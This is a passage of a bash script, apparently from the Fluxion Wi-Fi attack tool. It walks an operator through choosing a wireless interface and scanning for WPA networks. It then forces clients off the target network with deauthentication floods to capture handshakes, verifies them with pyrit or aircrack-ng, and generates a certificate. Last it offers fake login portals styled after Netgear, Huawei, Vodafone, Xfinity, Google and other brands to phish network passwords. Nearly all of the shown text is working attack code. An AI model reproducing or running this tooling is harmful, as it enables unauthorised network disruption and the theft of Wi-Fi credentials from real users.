) source $WORK_DIR/language/esp; break;; 6 ) source $WORK_DIR/language/ch; break;; 7 ) source $WORK_DIR/language/it; break;; 8 ) source $WORK_DIR/language/cz break;; 9 ) source $WORK_DIR/language/gr; break;; 10 ) source $WORK_DIR/language/fr; break;; 11 ) source $WORK_DIR/language/svn; break;; * ) echo "Unknown option. Please choose again"; conditional_clear ;; esac done fi } # Choose Interface function setinterface { conditional_clear top #unblock interfaces rfkill unblock all # Collect all interfaces in montitor mode & stop all KILLMONITOR=`iwconfig 2>&1 | grep Monitor | awk '{print $1}'` for monkill in ${KILLMONITOR[@]}; do airmon-ng stop $monkill >$flux_output_device echo -n "$monkill, " done # Create a variable with the list of physical network interfaces readarray -t wirelessifaces < <(./lib/airmon/airmon.sh |grep "-" | cut -d- -f1) INTERFACESNUMBER=`./lib/airmon/airmon.sh | grep -c "-"` if [ "$INTERFACESNUMBER" -gt "0" ]; then if [ "$INTERFACESNUMBER" -eq "1" ]; then PREWIFI=$(echo ${wirelessifaces[0]} | awk '{print $1}') else echo $header_setinterface echo i=0 for line in "${wirelessifaces[@]}"; do i=$(($i+1)) wirelessifaces[$i]=$line echo -e " "$red"["$yellow"$i"$red"]"$transparent" $line" done if [ "$FLUX_AUTO" = "1" ];then line="1" else echo echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read line fi PREWIFI=$(echo ${wirelessifaces[$line]} | awk '{print $1}') fi if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then conditional_clear top setinterface fi readarray -t naggysoftware < <(./lib/airmon/airmon.sh check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }') WIFIDRIVER=$(./lib/airmon/airmon.sh | grep "$PREWIFI" | awk '{print($(NF-2))}') if [ ! "$(echo $WIFIDRIVER | egrep 'rt2800|rt73')" ]; then rmmod -f "$WIFIDRIVER" &>$flux_output_device 2>&1 fi if [ $KEEP_NETWORK = 0 ]; then for nagger in "${naggysoftware[@]}"; do killall "$nagger" &>$flux_output_device done sleep 0.5 fi if [ ! "$(echo $WIFIDRIVER | egrep 'rt2800|rt73')" ]; then modprobe "$WIFIDRIVER" &>$flux_output_device 2>&1 sleep 0.5 fi # Select Wifi Interface select PREWIFI in $INTERFACES; do break; done WIFIMONITOR=$(./lib/airmon/airmon.sh start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1) WIFI_MONITOR=$WIFIMONITOR WIFI=$PREWIFI #No wireless cards else echo $setinterface_error sleep 5 exitmode fi ghost } # Check files function ghost { conditional_clear CSVDB=dump-01.csv rm -rf $DUMP_PATH/* choosescan selection } # Select channel function choosescan { if [ "$FLUX_AUTO" = "1" ];then Scan else conditional_clear while true; do conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_choosescan" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $choosescan_option_1 " echo -e " "$red"["$yellow"2"$red"]"$transparent" $choosescan_option_2 " echo -e " "$red"["$yellow"3"$red"]"$red" $general_back " $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) Scan ; break ;; 2 ) Scanchan ; break ;; 3 ) setinterface; break;; * ) echo "Unknown option. Please choose again"; conditional_clear ;; esac done fi } # Choose your channel if you choose option 2 before function Scanchan { conditional_clear top echo " " echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_choosescan " echo " " echo -e " $scanchan_option_1 "$blue"6"$transparent" " echo -e " $scanchan_option_2 "$blue"1-5"$transparent" " echo -e " $scanchan_option_2 "$blue"1,2,5-7,11"$transparent" " echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read channel_number set -- ${channel_number} conditional_clear rm -rf $DUMP_PATH/dump* xterm $HOLD -title "$header_scanchan [$channel_number]" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump --channel "$channel_number" -a $WIFI_MONITOR --ignore-negative-one } # Scans the entire network function Scan { conditional_clear rm -rf $DUMP_PATH/dump* if [ "$FLUX_AUTO" = "1" ];then sleep 30 && killall xterm & fi xterm $HOLD -title "$header_scan" $TOPLEFTBIG -bg "#FFFFFF" -fg "#000000" -e airodump-ng --encrypt WPA -w $DUMP_PATH/dump -a $WIFI_MONITOR --ignore-negative-one } # Choose a network function selection { conditional_clear top LINEAS_WIFIS_CSV=`wc -l $DUMP_PATH/$CSVDB | awk '{print $1}'` if [ "$LINEAS_WIFIS_CSV" = "" ];then conditional_clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" Error: your wireless card isn't supported " echo -n -e $transparent"Do you want exit? "$red"["$yellow"Y"$transparent"es / "$yellow"N"$transparent"o"$red"]"$transparent":" read back if [ $back = 'n' ] && [ $back = 'N' ] && [ $back = 'no' ] && [ $back = 'No' ];then clear && exitmode elif [ $back = 'y' ] && [ $back = 'Y' ] && [ $back = 'yes' ] && [ $back = 'Yes' ];then clear && setinterface fi fi if [ $LINEAS_WIFIS_CSV -le 3 ]; then ghost && break fi fluxionap=`cat $DUMP_PATH/$CSVDB | egrep -a -n '(Station|Cliente)' | awk -F : '{print $1}'` fluxionap=`expr $fluxionap - 1` head -n $fluxionap $DUMP_PATH/$CSVDB &> $DUMP_PATH/dump-02.csv tail -n +$fluxionap $DUMP_PATH/$CSVDB &> $DUMP_PATH/clientes.csv echo " WIFI LIST " echo "" echo " ID MAC CHAN SECU PWR ESSID" echo "" i=0 while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do longueur=${#MAC} PRIVACY=$(echo $PRIVACY| tr -d "^ ") PRIVACY=${PRIVACY:0:4} if [ $longueur -ge 17 ]; then i=$(($i+1)) POWER=`expr $POWER + 100` CLIENTE=`cat $DUMP_PATH/clientes.csv | grep $MAC` if [ "$CLIENTE" != "" ]; then CLIENTE="*" echo -e " "$red"["$yellow"$i"$red"]"$green"$CLIENTE\t""$red"$MAC"\t""$red "$CHANNEL"\t""$green" $PRIVACY"\t ""$red"$POWER%"\t""$red "$ESSID""$transparent"" else echo -e " "$red"["$yellow"$i"$red"]"$white"$CLIENTE\t""$yellow"$MAC"\t""$green "$CHANNEL"\t""$blue" $PRIVACY"\t ""$yellow"$POWER%"\t""$green "$ESSID""$transparent"" fi aidlength=$IDLENGTH assid[$i]=$ESSID achannel[$i]=$CHANNEL amac[$i]=$MAC aprivacy[$i]=$PRIVACY aspeed[$i]=$SPEED fi done < $DUMP_PATH/dump-02.csv # Select the first network if you select the first network if [ "$FLUX_AUTO" = "1" ];then choice=1 else echo echo -e ""$blue "("$white"*"$blue") $selection_1"$transparent"" echo "" echo -e " $selection_2" echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read choice fi if [[ $choice -eq "r" ]]; then ghost fi idlength=${aidlength[$choice]} ssid=${assid[$choice]} channel=$(echo ${achannel[$choice]}|tr -d [:space:]) mac=${amac[$choice]} privacy=${aprivacy[$choice]} speed=${aspeed[$choice]} Host_IDL=$idlength Host_SPEED=$speed Host_ENC=$privacy Host_MAC=$mac Host_CHAN=$channel acouper=${#ssid} fin=$(($acouper-idlength)) Host_SSID=${ssid:1:fin} Host_SSID2=`echo $Host_SSID | sed 's/ //g' | sed 's/\[//g;s/\]//g' | sed 's/\://g;s/\://g' | sed 's/\*//g;s/\*//g' | sed 's/(//g' | sed 's/)//g'` conditional_clear askAP } # FakeAP function askAP { DIGITOS_WIFIS_CSV=`echo "$Host_MAC" | wc -m` if [ $DIGITOS_WIFIS_CSV -le 15 ]; then selection && break fi if [ "$(echo $WIFIDRIVER | grep 8187)" ]; then fakeapmode="airbase-ng" askauth fi if [ "$FLUX_AUTO" = "1" ];then fakeapmode="hostapd"; authmode="handshake"; handshakelocation else top while true; do infoap echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_askAP" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $askAP_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $askAP_option_2" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) fakeapmode="hostapd"; authmode="handshake"; handshakelocation; break ;; 2 ) fakeapmode="airbase-ng"; askauth; break ;; 3 ) selection; break ;; * ) echo "$general_case_error"; conditional_clear ;; esac done fi } # Test Passwords / airbase-ng function askauth { if [ "$FLUX_AUTO" = "1" ];then authmode="handshake"; handshakelocation else conditional_clear top while true; do echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_askauth" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" $askauth_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $askauth_option_2" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) authmode="handshake"; handshakelocation; break ;; 2 ) authmode="wpa_supplicant"; webinterface; break ;; 3 ) askAP; break ;; * ) echo "$general_case_error"; conditional_clear ;; esac done fi } function handshakelocation { conditional_clear top infoap if [ -f "/root/handshakes/$Host_SSID2-$Host_MAC.cap" ]; then echo -e "Handshake $yellow$Host_SSID-$Host_MAC.cap$transparent found in /root/handshakes." echo -e "${red}Do you want to use this file? (y/N)" echo -ne "$transparent" if [ "$FLUX_AUTO" = "0" ];then read usehandshakefile fi if [ "$usehandshakefile" = "y" -o "$usehandshakefile" = "Y" ]; then handshakeloc="/root/handshakes/$Host_SSID2-$Host_MAC.cap" fi fi if [ "$handshakeloc" = "" ]; then echo echo -e "handshake location (Example: $red$WORK_DIR.cap$transparent)" echo -e "Press ${yellow}ENTER$transparent to skip" echo echo -ne "Path: " if [ "$FLUX_AUTO" = "0" ];then read handshakeloc fi fi if [ "$handshakeloc" = "" ]; then deauthforce else if [ -f "$handshakeloc" ]; then pyrit -r "$handshakeloc" analyze &>$flux_output_device pyrit_broken=$? if [ $pyrit_broken = 0 ]; then Host_SSID_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d "(" -f2 | cut -d "'" -f2) Host_MAC_loc=$(pyrit -r "$handshakeloc" analyze 2>&1 | grep "^#" | cut -d " " -f3 | tr '[:lower:]' '[:upper:]') else Host_SSID_loc=$(timeout -s SIGKILL 3 aircrack-ng "$handshakeloc" | grep WPA | grep '1 handshake' | awk '{print $3}') Host_MAC_loc=$(timeout -s SIGKILL 3 aircrack-ng "$handshakeloc" | grep WPA | grep '1 handshake' | awk '{print $2}') fi if [[ "$Host_MAC_loc" == *"$Host_MAC"* ]] && [[ "$Host_SSID_loc" == *"$Host_SSID"* ]]; then if [ $pyrit_broken = 0 ] && pyrit -r $handshakeloc analyze 2>&1 | sed -n /$(echo $Host_MAC | tr '[:upper:]' '[:lower:]')/,/^#/p | grep -vi "AccessPoint" | grep -qi "good,"; then cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap certssl else echo -e $yellow "Corrupted handshake" $transparent echo sleep 2 echo "Do you want to try aicrack-ng instead of pyrit to verify the handshake? [ENTER = NO]" echo read handshakeloc_aircrack echo -ne "$transparent" if [ "$handshakeloc_aircrack" = "" ]; then handshakelocation else if timeout -s SIGKILL 3 aircrack-ng $handshakeloc | grep -q "1 handshake"; then cp "$handshakeloc" $DUMP_PATH/$Host_MAC-01.cap certssl else echo "Corrupted handshake" sleep 2 handshakelocation fi fi fi else echo -e "${red}$general_error_1$transparent!" echo echo -e "File ${red}MAC$transparent" readarray -t lista_loc < <(pyrit -r $handshakeloc analyze 2>&1 | grep "^#") for i in "${lista_loc[@]}"; do echo -e "$green $(echo $i | cut -d " " -f1) $yellow$(echo $i | cut -d " " -f3 | tr '[:lower:]' '[:upper:]')$transparent ($green $(echo $i | cut -d "(" -f2 | cut -d "'" -f2)$transparent)" done echo -e "Host ${green}MAC$transparent" echo -e "$green #1: $yellow$Host_MAC$transparent ($green $Host_SSID$transparent)" sleep 7 handshakelocation fi else echo -e "File ${red}NOT$transparent present" sleep 2 handshakelocation fi fi } function deauthforce { if [ "$FLUX_AUTO" = "1" ];then handshakemode="normal"; askclientsel else conditional_clear top while true; do echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthforce" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" pyrit" $transparent echo -e " "$red"["$yellow"2"$red"]"$transparent" $deauthforce_option_1" echo -e " "$red"["$yellow"3"$red"]"$red" $general_back" $transparent echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) handshakemode="normal"; askclientsel; break ;; 2 ) handshakemode="hard"; askclientsel; break ;; 3 ) askauth; break ;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } ############################################### < MENU > ############################################### ############################################# < HANDSHAKE > ############################################ # Type of deauthentication to be performed function askclientsel { if [ "$FLUX_AUTO" = "1" ];then deauth all else conditional_clear while true; do top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthMENU" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Deauth all"$transparent echo -e " "$red"["$yellow"2"$red"]"$transparent" Deauth all [mdk3]" echo -e " "$red"["$yellow"3"$red"]"$transparent" Deauth target " echo -e " "$red"["$yellow"4"$red"]"$transparent" Rescan networks " echo -e " "$red"["$yellow"5"$red"]"$transparent" Exit" echo " " echo -n -e ""$red"["$blue"deltaxflux"$yellow"@"$white"fluxion"$red"]-["$yellow"~"$red"]"$transparent"" read yn echo "" case $yn in 1 ) deauth all; break ;; 2 ) deauth mdk3; break ;; 3 ) deauth esp; break ;; 4 ) killall airodump-ng &>$flux_output_device; ghost; break;; 5 ) exitmode; break ;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } # function deauth { conditional_clear iwconfig $WIFI_MONITOR channel $Host_CHAN case $1 in all ) DEAUTH=deauthall capture & $DEAUTH CSVDB=$Host_MAC-01.csv ;; mdk3 ) DEAUTH=deauthmdk3 capture & $DEAUTH & CSVDB=$Host_MAC-01.csv ;; esp ) DEAUTH=deauthesp HOST=`cat $DUMP_PATH/$CSVDB | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC` LINEAS_CLIENTES=`echo "$HOST" | wc -m | awk '{print $1}'` if [ $LINEAS_CLIENTES -le 5 ]; then DEAUTH=deauthall capture & $DEAUTH CSVDB=$Host_MAC-01.csv deauth fi capture for CLIENT in $HOST; do Client_MAC=`echo ${CLIENT:0:17}` deauthesp done $DEAUTH CSVDB=$Host_MAC-01.csv ;; esac deauthMENU } function deauthMENU { if [ "$FLUX_AUTO" = "1" ];then while true;do checkhandshake && sleep 5 done else while true; do conditional_clear clear top echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_deauthMENU " echo echo -e "Status handshake: $Handshake_statuscheck" echo echo -e " "$red"["$yellow"1"$red"]"$grey" $deauthMENU_option_1" echo -e " "$red"["$yellow"2"$red"]"$transparent" $general_back " echo -e " "$red"["$yellow"3"$red"]"$transparent" Select another network" echo -e " "$red"["$yellow"4"$red"]"$transparent" Exit" echo -n ' #> ' read yn case $yn in 1 ) checkhandshake;; 2 ) conditional_clear; killall xterm; askclientsel; break;; 3 ) killall airodump-ng mdk3 aireplay-ng xterm &>$flux_output_device; CSVDB=dump-01.csv; breakmode=1; killall xterm; selection; break ;; 4 ) exitmode; break;; * ) echo " $general_case_error"; conditional_clear ;; esac done fi } # Capture all function capture { conditional_clear if ! ps -A | grep -q airodump-ng; then rm -rf $DUMP_PATH/$Host_MAC* xterm $HOLD -title "Capturing data on channel --> $Host_CHAN" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $Host_MAC -w $DUMP_PATH/$Host_MAC -c $Host_CHAN -a $WIFI_MONITOR --ignore-negative-one & fi } # Check the handshake before continuing function checkhandshake { if [ "$handshakemode" = "normal" ]; then if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then killall airodump-ng mdk3 aireplay-ng &>$flux_output_device wpaclean $HANDSHAKE_PATH/$Host_SSID2-$Host_MAC.cap $DUMP_PATH/$Host_MAC-01.cap &>$flux_output_device certssl i=2 break else Handshake_statuscheck="${red}Not_Found$transparent" fi elif [ "$handshakemode" = "hard" ]; then pyrit -r $DUMP_PATH/$Host_MAC-01.cap -o $DUMP_PATH/test.cap stripLive &>$flux_output_device if pyrit -r $DUMP_PATH/test.cap analyze 2>&1 | grep -q "good,"; then killall airodump-ng mdk3 aireplay-ng &>$flux_output_device pyrit -r $DUMP_PATH/test.cap -o $HANDSHAKE_PATH/$Host_SSID2-$Host_MAC.cap strip &>$flux_output_device certssl i=2 break else if aircrack-ng $DUMP_PATH/$Host_MAC-01.cap | grep -q "1 handshake"; then Handshake_statuscheck="${yellow}Corrupted$transparent" else Handshake_statuscheck="${red}Not_found$transparent" fi fi rm $DUMP_PATH/test.cap &>$flux_output_device fi } ############################################# < HANDSHAKE > ############################################ function certssl { # Test if the ssl certificate is generated correcly if there is any if [ -f $DUMP_PATH/server.pem ]; then if [ -s $DUMP_PATH/server.pem ]; then webinterface break else if [ "$FLUX_AUTO" = "1" ];then creassl fi while true;do conditional_clear top echo " " echo -e ""$red"["$yellow"2"$red"]"$transparent" Certificate invalid or not present, please choose an option" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Create a SSL certificate" echo -e " "$red"["$yellow"2"$red"]"$transparent" Search for SSL certificate" # hop to certssl check again echo -e " "$red"["$yellow"3"$red"]"$red" Exit" $transparent echo " " echo -n ' #> ' read yn case $yn in 1 ) creassl;; 2 ) certssl;break;; 3 ) exitmode; break;; * ) echo "$general_case_error"; conditional_clear esac done fi else if [ "$FLUX_AUTO" = "1" ];then creassl fi while true; do conditional_clear top echo " " echo " Certificate invalid or not present, please choice" echo " " echo -e " "$red"["$yellow"1"$red"]"$grey" Create a SSL certificate" echo -e " "$red"["$yellow"2"$red"]"$transparent" Search for SSl certificate" # hop to certssl check again echo -e " "$red"["$yellow"3"$red"]"$red" Exit" $transparent echo " " echo -n ' #> ' read yn case $yn in 1 ) creassl;; 2 ) certssl; break;; 3 ) exitmode; break;; * ) echo "$general_case_error"; conditional_clear esac done fi } # Create Self-Signed SSL Certificate function creassl { xterm -title "Create Self-Signed SSL Certificate" -e openssl req -subj '/CN=SEGURO/O=SEGURA/OU=SEGURA/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout /$DUMP_PATH/server.pem -out /$DUMP_PATH/server.pem # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html certssl } ############################################# < ATAQUE > ############################################ # Select attack strategie that will be used function webinterface { chmod 400 $DUMP_PATH/server.pem if [ "$FLUX_AUTO" = "1" ];then matartodo; ConnectionRESET; selection else while true; do conditional_clear top infoap echo echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_webinterface" echo echo -e " "$red"["$yellow"1"$red"]"$grey" Web Interface" echo -e " "$red"["$yellow"2"$red"]"$transparent" \e[1;31mExit"$transparent"" echo echo -n "#? " read yn case $yn in 1 ) matartodo; ConnectionRESET; selection; break;; 2 ) matartodo; exitmode; break;; esac done fi } function ConnectionRESET { if [ "$FLUX_AUTO" = "1" ];then webconf=1 else while true; do conditional_clear top infoap n=1 echo echo -e ""$red"["$yellow"2"$red"]"$transparent" $header_ConnectionRESET" echo echo -e " "$red"["$yellow"$n"$red"]"$transparent" English [ENG] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" German [GER] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Russian [RUS] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Italian [IT] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Spanish [ESP] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Portuguese [POR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Chinese [CN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" French [FR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Turkish [TR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Romanian [RO] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Hungarian [HU] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Arabic [ARA] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Greek [GR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Czech [CZ] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Norwegian [NO] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Bulgarian [BG] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Serbian [SRB] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Polish [PL] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Indonesian [ID] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Dutch [NL] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Danish [DAN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Hebrew [HE] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Thai [TH] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Portuguese [BR] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Slovenian [SVN] (NEUTRA)";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Belkin [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Netgear [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Huawei [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Verizon [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Netgear [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Arris [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Vodafone [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" TP-Link [ENG]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Ziggo [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" KPN [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Ziggo2016 [NL]";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" FRITZBOX_DE [DE] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" FRITZBOX_ENG[ENG] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" GENEXIS_DE [DE] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Netgear[Login-Netgear] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Login-Xfinity[Login-Xfinity] ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Telekom ";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" Google";n=` expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent" MOVISTAR [ESP]";n=`expr $n + 1` echo -e " "$red"["$yellow"$n"$red"]"$transparent"\e[1;31m $general_back"$transparent"" echo echo -n "#? " read webconf if [ "$webconf" = "1" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ENG DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ENG DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ENG DIALOG_WEB_OK=$DIALOG_WEB_OK_ENG DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ENG DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ENG DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ENG DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_ENG DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_ENG DIALOG_WEB_DIR=$DIALOG_WEB_DIR_ENG NEUTRA break elif [ "$webconf" = "2" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_GER DIALOG_WEB_INFO=$DIALOG_WEB_INFO_GER DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_GER DIALOG_WEB_OK=$DIALOG_WEB_OK_GER DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_GER DIALOG_WEB_BACK=$DIALOG_WEB_BACK_GER DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_GER DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_GER DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_GER DIALOG_WEB_DIR=$DIALOG_WEB_DIR_GER NEUTRA break elif [ "$webconf" = "3" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_RUS DIALOG_WEB_INFO=$DIALOG_WEB_INFO_RUS DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_RUS DIALOG_WEB_OK=$DIALOG_WEB_OK_RUS DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_RUS DIALOG_WEB_BACK=$DIALOG_WEB_BACK_RUS DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_RUS DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_RUS DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_RUS DIALOG_WEB_DIR=$DIALOG_WEB_DIR_RUS NEUTRA break elif [ "$webconf" = "4" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_IT DIALOG_WEB_INFO=$DIALOG_WEB_INFO_IT DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_IT DIALOG_WEB_OK=$DIALOG_WEB_OK_IT DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_IT DIALOG_WEB_BACK=$DIALOG_WEB_BACK_IT DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_IT DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_IT DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_IT DIALOG_WEB_DIR=$DIALOG_WEB_DIR_IT NEUTRA break elif [ "$webconf" = "5" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_ESP DIALOG_WEB_INFO=$DIALOG_WEB_INFO_ESP DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_ESP DIALOG_WEB_OK=$DIALOG_WEB_OK_ESP DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_ESP DIALOG_WEB_BACK=$DIALOG_WEB_BACK_ESP DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_ESP DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_ESP DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_ESP DIALOG_WEB_DIR=$DIALOG_WEB_DIR_ESP NEUTRA break elif [ "$webconf" = "6" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_POR DIALOG_WEB_INFO=$DIALOG_WEB_INFO_POR DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_POR DIALOG_WEB_OK=$DIALOG_WEB_OK_POR DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_POR DIALOG_WEB_BACK=$DIALOG_WEB_BACK_POR DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_POR DIALOG_WEB_LENGTH_MIN=$DIALOG_WEB_LENGTH_MIN_POR DIALOG_WEB_LENGTH_MAX=$DIALOG_WEB_LENGTH_MAX_POR DIALOG_WEB_DIR=$DIALOG_WEB_DIR_POR NEUTRA break elif [ "$webconf" = "7" ]; then DIALOG_WEB_ERROR=$DIALOG_WEB_ERROR_CN DIALOG_WEB_INFO=$DIALOG_WEB_INFO_CN DIALOG_WEB_INPUT=$DIALOG_WEB_INPUT_CN DIALOG_WEB_OK=$DIALOG_WEB_OK_CN DIALOG_WEB_SUBMIT=$DIALOG_WEB_SUBMIT_CN DIALOG_WEB_BACK=$DIALOG_WEB_BACK_CN DIALOG_WEB_ERROR_MSG=$DIALOG_WEB_ERROR_MSG_CN 